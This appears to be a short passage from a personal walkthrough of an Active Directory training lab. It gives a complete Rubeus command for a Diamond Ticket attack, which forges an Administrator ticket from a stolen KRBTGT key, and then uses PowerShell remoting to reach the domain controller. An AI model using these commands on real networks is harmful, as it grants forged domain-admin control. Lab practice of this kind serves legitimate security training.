Now since we have the Secrets of the KRBTGT account let’s use Rubeus to Execute Diamond Ticket Attack

.\\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\\Windows\\System32\\cmd.exe /show /ptt

In the new CMD let’s open PowerShell and bypass the Execution Policy and PS Remote To The Domain Controller

Enter-PSSession -ComputerName dcorp-dc

Awesome I Did it!